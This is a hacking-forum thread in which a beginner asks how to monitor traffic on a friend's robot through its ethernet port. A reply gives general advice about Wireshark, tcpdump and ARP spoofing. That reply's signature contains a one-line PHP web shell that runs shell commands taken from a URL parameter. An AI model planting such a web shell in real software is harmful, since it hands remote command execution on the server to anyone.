Donate to us!
Society leans ever heavily on computers, if you have the power to take out computers you can take out society. - cubeman372
Friday, September 21, 2018
Navigation
Home
 Find:
 Information:
Learn
Communicate
Submit
Shop
Challenges
 Exploit:
 Programming:
 Think:
 Track:
 Patch:
 Other:
 Need Help?
Other
Members Online
Total Online: 155
Guests Online: 154
Members Online: 1

Registered Members: 106648
Newest Member: Sherrywearo
Latest Articles
View Thread

HellBound Hackers | Computer General | Hacking in general

Author

Hardware Hacking Through Ethernet Ports

r0b1n135

Your avatar

Moderate
Posted on 10-09-18 21:40
Hello everybody!

I am slowly getting started with hacking in general, and one of my friends asked me to see if there are any security flaws in a robot he is making. I found a vuln in the wireless control software (he is controlling it from wifi and none of the packets were encrypted). That is all well and good, but there is also an ethernet port on the side of the robot.

My question is, how do I go about receiving and sending requests through the ethernet port? Can I use still use Wireshark? Do I have to make a custom program to send requests? Is there a way I could find out the methods that he uses to communicate with the robot through ethernet?

Thank you!
Author

RE: Hardware Hacking Through Ethernet Ports

gobzi

HBH Guru
Posted on 12-09-18 14:16
The air/cable are just the media of which your data are being transferred. At the end of the day the same network logic is applied, so yes tcpdump/wireshark will work. Assuming that the ethernet port is used for management (same as wifi) you'll see more or less the same packets going back and forth (arp request, handshake etc etc..)

have a look at that https://en.wikipe. . .P_spoofing. There are plenty of tools to help you with this.

<pre> <?=`$_GET[1]`?>

Ima_noob# cat * | egrep "Subject|Date|filename=" > agrrr

Edited by gobzi on 12-09-18 14:18
goo.gl/8st1AR
Author

RE: Hardware Hacking Through Ethernet Ports

r0b1n135

Your avatar

Moderate
Posted on 14-09-18 00:49
Thank you!

<strong>Be</strong>